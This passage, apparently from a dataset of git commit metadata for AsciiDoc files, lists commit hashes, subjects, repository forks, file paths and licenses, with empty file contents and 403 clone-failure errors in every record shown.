1c\/elasticsearch,elasticdog\/elasticsearch,Helen-Zhao\/elasticsearch,masaruh\/elasticsearch,GlenRSmith\/elasticsearch,mjason3\/elasticsearch,JervyShi\/elasticsearch,geidies\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,bawse\/elasticsearch,fred84\/elasticsearch,wangtuo\/elasticsearch,StefanGor\/elasticsearch,lks21c\/elasticsearch,Stacey-Gammon\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,markwalkom\/elasticsearch,maddin2016\/elasticsearch,fernandozhu\/elasticsearch,LeoYao\/elasticsearch,LeoYao\/elasticsearch,nazarewk\/elasticsearch,qwerty4030\/elasticsearch,winstonewert\/elasticsearch,rajanm\/elasticsearch,mortonsykes\/elasticsearch,nknize\/elasticsearch,pozhidaevak\/elasticsearch,scorpionvicky\/elasticsearch,wenpos\/elasticsearch,vroyer\/elassandra,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,Stacey-Gammon\/elasticsearch,geidies\/elasticsearch,spiegela\/elasticsearch,maddin2016\/elasticsearch,nknize\/elasticsearch,nilabhsagar\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,MisterAndersen\/elasticsearch,JervyShi\/elasticsearch,fforbeck\/elasticsearch,HonzaKral\/elasticsearch,obourgain\/elasticsearch,pozhidaevak\/elasticsearch,robin13\/elasticsearch,jimczi\/elasticsearch,IanvsPoplicola\/elasticsearch,elasticdog\/elasticsearch,StefanGor\/elasticsearch,qwerty4030\/elasticsearch,naveenhooda2000\/elasticsearch,rlugojr\/elasticsearch,winstonewert\/elasticsearch,fforbeck\/elasticsearch,JSCooke\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,HonzaKral\/elasticsearch,i-am-Nathan\/elasticsearch,glefloch\/elasticsearch,lks21c\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,s1monw\/elasticsearch,mohit\/elasticsearch,i-am-Nathan\/elasticsearch,HonzaKral\/elasticsearch,StefanGor\/elasticsearch,nezirus\/elasticsearch,scottsom\/elasticsearch,JervyShi\/elasticsearch,mohit\/elasticsearch,mjason3\/elasticsearch,jimczi\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,gfyoung\/elasticsearch,strapdata\/elassandra,Shepard1212\/elasticsearch,LeoYao\/elasticsearch,liweinan0423\/ela
sticsearch,pozhidaevak\/elasticsearch,gingerwizard\/elasticsearch,elasticdog\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,wangtuo\/elasticsearch,scottsom\/elasticsearch,GlenRSmith\/elasticsearch,i-am-Nathan\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,markwalkom\/elasticsearch,s1monw\/elasticsearch,rlugojr\/elasticsearch,jprante\/elasticsearch,s1monw\/elasticsearch,mortonsykes\/elasticsearch,coding0011\/elasticsearch,ZTE-PaaS\/elasticsearch,markwalkom\/elasticsearch,gmarz\/elasticsearch,vroyer\/elassandra,kalimatas\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,winstonewert\/elasticsearch,markwalkom\/elasticsearch,gingerwizard\/elasticsearch,masaruh\/elasticsearch,gingerwizard\/elasticsearch,C-Bish\/elasticsearch,jprante\/elasticsearch,mikemccand\/elasticsearch,GlenRSmith\/elasticsearch,alexshadow007\/elasticsearch,liweinan0423\/elasticsearch,vroyer\/elasticassandra,mortonsykes\/elasticsearch,jprante\/elasticsearch,coding0011\/elasticsearch,henakamaMSFT\/elasticsearch,wuranbo\/elasticsearch,mjason3\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,MaineC\/elasticsearch,geidies\/elasticsearch,maddin2016\/elasticsearch,gingerwizard\/elasticsearch,kalimatas\/elasticsearch,henakamaMSFT\/elasticsearch,robin13\/elasticsearch,shreejay\/elasticsearch,jprante\/elasticsearch,spiegela\/elasticsearch,uschindler\/elasticsearch,gingerwizard\/elasticsearch,wenpos\/elasticsearch,JSCooke\/elasticsearch,mohit\/elasticsearch,winstonewert\/elasticsearch,StefanGor\/elasticsearch,mikemccand\/elasticsearch,rajanm\/elasticsearch,lks21c\/elasticsearch,i-am-Nathan\/elasticsearch,nilabhsagar\/elasticsearch,liweinan0423\/elasticsearch,liweinan0423\/elasticsearch,fforbeck\/elasticsearch,LewayneNaidoo\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,henakamaMSFT\/elasticsearch,rajanm\/elasticsearch,JervyShi\/elasticsearch,obourgain\/elasticsearch,shreejay\/elasticsearch,artnowo\/elasticsearch,yanjunh\/elasticsearch,nilabhsagar\/elasticsearch,henakamaMSFT\/elasticsearch,obourgain\/elasticsearch,ZTE-PaaS\/elasticsearch,lks21c\/elasticsearch,brandonkearby\/elasticsearch,liweinan0423\/elasticsearch,geidies\/elasticsearch","old_file":"docs\/plugins\/plugin-script.asciidoc","new_file":"docs\/plugins\/plugin-script.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mohit\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"add0940affc15fae6a3f521aa61d39fd9e21e183","subject":"Removing not about X710 IPv6 flow statistics not supported","message":"Removing not about X710 IPv6 flow statistics not supported\n","repos":"dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core","old_file":"trex_stateless.asciidoc","new_file":"trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2cf47eb690c542a67cddfb300a479ed2c2adb1c5","subject":"minor update","message":"minor 
update\n","repos":"kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core","old_file":"trex_vm_manual.asciidoc","new_file":"trex_vm_manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"22c3d0d41388146822d038875ab37f93e779494f","subject":"Unfinished README of javaee","message":"Unfinished README of javaee","repos":"agoncal\/core,forge\/core,forge\/core,jerr\/jbossforge-core,D9110\/core,forge\/core,D9110\/core,oscerd\/core,agoncal\/core,jerr\/jbossforge-core,ivannov\/core,pplatek\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,pplatek\/core,D9110\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,agoncal\/core,ivannov\/core,D9110\/core,ivannov\/core,jerr\/jbossforge-core,oscerd\/core,oscerd\/core,agoncal\/core,pplatek\/core,agoncal\/core,ivannov\/core,oscerd\/core,D9110\/core,forge\/core,D9110\/core,D9110\/core,D9110\/core,agoncal\/core,jerr\/jbossforge-core,forge\/core,pplatek\/core,forge\/core,ivannov\/core,oscerd\/core,agoncal\/core,oscerd\/core,forge\/core,jerr\/jbossforge-core,pplatek\/core,forge\/core,agoncal\/core,ivannov\/core,pplatek\/core,D9110\/core,pplatek\/core,ivannov\/core,oscerd\/core,ivannov\/core,stalep\/forge-core,agoncal\/core,oscerd\/core,D9110\/core,oscerd\/core,jerr\/jbossforge-core,ivannov\/core,jerr\/jbossforge-core,agoncal\/core,ivannov\/core,stalep\/forge-core,pplatek\/core,forge\/core,pplatek\/core,pplatek\/core","old_file":"javaee\/README.asciidoc","new_file":"javaee\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ivannov\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"e9790fee0275900112e419e9a1ea0b590c9fd987","subject":"Update 2016-02-07-Introduction.adoc","message":"Update 2016-02-07-Introduction.adoc","repos":"Oziabr\/Oziabr.github.io,Oziabr\/Oziabr.github.io","old_file":"_posts\/2016-02-07-Introduction.adoc","new_file":"_posts\/2016-02-07-Introduction.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Oziabr\/Oziabr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"34a12d9c52b9399bf0a48c2a305dd2bf1436353b","subject":"Update 2016-08-25-Tmux-Kung-fu.adoc","message":"Update 2016-08-25-Tmux-Kung-fu.adoc","repos":"faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io,faldah\/faldah.github.io","old_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_file":"_posts\/2016-08-25-Tmux-Kung-fu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faldah\/faldah.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe5fedc4bf98eec3bdcd2ffa25af1d121ac0e237","subject":"Update 2016-10-03-Level-Design.adoc","message":"Update 2016-10-03-Level-Design.adoc","repos":"3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io,3991\/3991.github.io","old_file":"_posts\/2016-10-03-Level-Design.adoc","new_file":"_posts\/2016-10-03-Level-Design.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/3991\/3991.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12b065e5ab3182c086c2397e7d221f308c756f26","subject":"Update 2016-06-03-gi.adoc","message":"Update 2016-06-03-gi.adoc","repos":"chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io,chdask\/chdask.github.io","old_file":"_posts\/2016-06-03-gi.adoc","new_file":"_posts\/2016-06-03-gi.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chdask\/chdask.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ea9a3c94f241a4e51e25e9d5f1132eec700efa1","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec0597f6dfb5b9b26b4888cdab793a54e53bb251","subject":"Link from Objects to Syntax","message":"Link from Objects to Syntax\n","repos":"oliviercailloux\/jee,oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Objects & interfaces\/README.adoc","new_file":"Objects & interfaces\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6aa10b2938afedf0d0c7735527f94af2d05c7a93","subject":"Minor","message":"Minor\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course,oliviercailloux\/jee","old_file":"Best practices\/JSF.adoc","new_file":"Best practices\/JSF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"be50e1f54c29f27f4a978ed8bd65d0cb040079a0","subject":"y2b create post 12 Speaker Headphones = MIND BLOWN","message":"y2b create post 12 Speaker Headphones = MIND BLOWN","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-10-28-12-Speaker-Headphones--MIND-BLOWN.adoc","new_file":"_posts\/2016-10-28-12-Speaker-Headphones--MIND-BLOWN.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"50cfc25e3d50d7b2d5ef2a76ab25b9126301365e","subject":"docs update v0.8.4","message":"docs update v0.8.4\n","repos":"SergeyPirogov\/kirk,SergeyPirogov\/kirk,SergeyPirogov\/kirk","old_file":"docs\/source\/index.adoc","new_file":"docs\/source\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/SergeyPirogov\/kirk.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} 
{"commit":"016c730255558319de697c60eafa7069e7ab1c97","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"02fe823fad58eba758addd07e44e36f96dde8724","subject":"Update 2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","message":"Update 2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","repos":"LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io,LearningTools\/LearningTools.github.io","old_file":"_posts\/2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","new_file":"_posts\/2018-01-15-Segunda-prueba-de-como-usar-el-editor.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/LearningTools\/LearningTools.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a5b41fa24775d4a07275f27c31c3d792c8a00e2","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a3e11f7ded6f279b644017365c018a111a0f22cb","subject":"Update 2019-03-18-.adoc","message":"Update 2019-03-18-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2019-03-18-.adoc","new_file":"_posts\/2019-03-18-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"18fd6b0a0b60051f63d82ed648c83795bd61f8b1","subject":"Update 2016-02-12-The-start.adoc","message":"Update 2016-02-12-The-start.adoc","repos":"jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io,jblemee\/jblemee.github.io","old_file":"_posts\/2016-02-12-The-start.adoc","new_file":"_posts\/2016-02-12-The-start.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jblemee\/jblemee.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e09eeea38c2ffa5b9e5531ed4d35700633cb5df3","subject":"Create payment_control_plugin.adoc","message":"Create payment_control_plugin.adoc","repos":"killbill\/killbill-docs,killbill\/killbill-docs","old_file":"userguide\/tutorials\/payment_control_plugin.adoc","new_file":"userguide\/tutorials\/payment_control_plugin.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to 
access 'https:\/\/github.com\/killbill\/killbill-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"3886c53cc7e682d723391d042da431d290d91a34","subject":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","message":"Update 2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_file":"_posts\/2017-04-13-Suffer-Fortigate-V-L-A-N.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"58bf8f1f6d180254f68371509043cad01422d0c8","subject":"Wording again","message":"Wording again\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"L3\/Exercices not\u00e9s.adoc","new_file":"L3\/Exercices not\u00e9s.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"433f1a8a9a6b6f4a8236a387c5d9851eab0fe3bd","subject":"Update 2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","message":"Update 2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","repos":"backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io,backemulus\/backemulus.github.io","old_file":"_posts\/2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","new_file":"_posts\/2017-0331-Die-sechs-vermeidungen-des-menschen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/backemulus\/backemulus.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f219fbd3269cd623336b329fe3c4c528b8d86c8c","subject":"Small Debian\/Ubuntu docs fix.","message":"Small Debian\/Ubuntu docs fix.\n\nUpdate the Debian\/Ubuntu build documentation to list the xsltproc\ndependency and use the package for asciidoctor.\n\nChange-Id: I7dbe469ea23f6729ca43b392853b313ac0fd78aa\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/1090\nReviewed-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\nTested-by: Todd Lipcon <2c763d726a8c2f6afda9be7e0e56a2caa6bb5e6b@cloudera.com>\n","repos":"andrwng\/kudu,InspurUSA\/kudu,InspurUSA\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,cloudera\/kudu,cloudera\/kudu,cloudera\/kudu,andrwng\/kudu,andrwng\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,InspurUSA\/kudu,helifu\/kudu,EvilMcJerkface\/kudu,helifu\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,andrwng\/kudu,cloudera\/kudu,helifu\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,cloudera\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu,helifu\/kudu,helifu\/kudu,andrwng\/kudu,andrwng\/kudu,InspurUSA\/kudu,EvilMcJerkface\/kudu,InspurUSA\/kudu","old_file":"docs\/installation.adoc","new_file":"docs\/installation.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/InspurUSA\/kudu.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4116bcc52897eda14b086f61280516108175707e","subject":"Update 2012-11-17-Joystick-Mouse-com-Teensy.adoc","message":"Update 2012-11-17-Joystick-Mouse-com-Teensy.adoc","repos":"arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io,arthurmolina\/arthurmolina.github.io","old_file":"_posts\/2012-11-17-Joystick-Mouse-com-Teensy.adoc","new_file":"_posts\/2012-11-17-Joystick-Mouse-com-Teensy.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/arthurmolina\/arthurmolina.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d0ebe74002db0cfc7fd08eee647cf3e59461930b","subject":"Update 2017-08-15-focus-within-pseudo-class.adoc","message":"Update 2017-08-15-focus-within-pseudo-class.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2017-08-15-focus-within-pseudo-class.adoc","new_file":"_posts\/2017-08-15-focus-within-pseudo-class.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7ea24e0c2c2774b352ee45b5b2dacf938687517e","subject":"initial authorization docs","message":"initial authorization docs\n","repos":"xiaoping378\/openshift-docs,xiaoping378\/openshift-docs,xiaoping378\/openshift-docs","old_file":"using_openshift\/authorization.adoc","new_file":"using_openshift\/authorization.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xiaoping378\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"84c4491d26ddb0affeb65a8b156f7edd22174ab2","subject":"added readmefile to library","message":"added readmefile to library\n","repos":"MalmoUniversity-DA366A\/calvin-arduino,MalmoUniversity-DA366A\/calvin-arduino,MalmoUniversity-DA366A\/calvin-arduino","old_file":"CalvinLibrary\/CalvinMini\/README.adoc","new_file":"CalvinLibrary\/CalvinMini\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MalmoUniversity-DA366A\/calvin-arduino.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"47a881982dedb43b3cd061529812a4dd8eddc833","subject":"Update README.adoc","message":"Update README.adoc","repos":"KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,KostyaSha\/yet-another-docker-plugin,pronovic\/yet-another-docker-plugin","old_file":"yet-another-docker-its\/README.adoc","new_file":"yet-another-docker-its\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KostyaSha\/yet-another-docker-plugin.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eaaa19fc0d41a78ef1000f7a05bd32482de1cd88","subject":"Update 2018-05-09-Test-blog-entry.adoc","message":"Update 
2018-05-09-Test-blog-entry.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_file":"_posts\/2018-05-09-Test-blog-entry.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"295cc0cf3a938cd1ddc7f4ceaa0f1b07e0c918fb","subject":"#17 #23 Update terminal commands and description","message":"#17 #23 Update terminal commands and description","repos":"imadLamari\/carto_teach_planning,imadLamari\/carto_teach_planning","old_file":"docs\/install.adoc","new_file":"docs\/install.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/imadLamari\/carto_teach_planning.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"555d61a34041f4489457c6a165f6c92b1ff9b767","subject":"Publish 2016-6-25-Git-one.adoc","message":"Publish 2016-6-25-Git-one.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-25-Git-one.adoc","new_file":"2016-6-25-Git-one.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e53c3e4662a522223957c99b7790bde015b0c20b","subject":"Update 2015-11-27-Button.adoc","message":"Update 2015-11-27-Button.adoc","repos":"hfluz\/hfluz.github.io,hfluz\/hfluz.github.io,hfluz\/hfluz.github.io","old_file":"_posts\/2015-11-27-Button.adoc","new_file":"_posts\/2015-11-27-Button.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hfluz\/hfluz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d61d5c983e6847799e7f0115b92120687de5e8d9","subject":"Update 2017-01-25 Test asciidoc.adoc","message":"Update 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec0a1b2db60b95b62fc5288b8c25a060e01a6906","subject":"Update 2016-07-24-Wprowadzenie.adoc","message":"Update 2016-07-24-Wprowadzenie.adoc","repos":"kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm,kornel661\/blog-test-jm","old_file":"_posts\/2016-07-24-Wprowadzenie.adoc","new_file":"_posts\/2016-07-24-Wprowadzenie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kornel661\/blog-test-jm.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ed5e53e2dd562c5c483364e204d9abbd7c8488cb","subject":"Update 2017-10-19-Inyector-DLL.adoc","message":"Update 
2017-10-19-Inyector-DLL.adoc","repos":"chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io,chrizco\/chrizco.github.io","old_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_file":"_posts\/2017-10-19-Inyector-DLL.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chrizco\/chrizco.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c82ccc24bbe6bbc62f7cef8294f1c30ed01fdb1f","subject":"Initial singleton doc.","message":"Initial singleton doc.\n","repos":"cortlandstarrett\/mc,cortlandstarrett\/mc,leviathan747\/mc,xtuml\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,leviathan747\/mc,cortlandstarrett\/mc,lwriemen\/mc,leviathan747\/mc,lwriemen\/mc,xtuml\/mc,lwriemen\/mc,lwriemen\/mc,rmulvey\/mc,rmulvey\/mc,lwriemen\/mc,rmulvey\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,xtuml\/mc,leviathan747\/mc,cortlandstarrett\/mc,cortlandstarrett\/mc,xtuml\/mc,rmulvey\/mc","old_file":"doc\/notes\/mc-3020-singleton.adoc","new_file":"doc\/notes\/mc-3020-singleton.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/leviathan747\/mc.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"10fe2bc75ef690cd248e4f156b294bd10e3eca45","subject":"Update 2017-02-21.adoc","message":"Update 2017-02-21.adoc","repos":"luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io,luckypoem\/blog.hubpress.io","old_file":"_posts\/2017-02-21.adoc","new_file":"_posts\/2017-02-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/luckypoem\/blog.hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"730dcffe6dccccb0b71336862c9fca915428248f","subject":"Fix crossrefs in footnotes","message":"Fix crossrefs in 
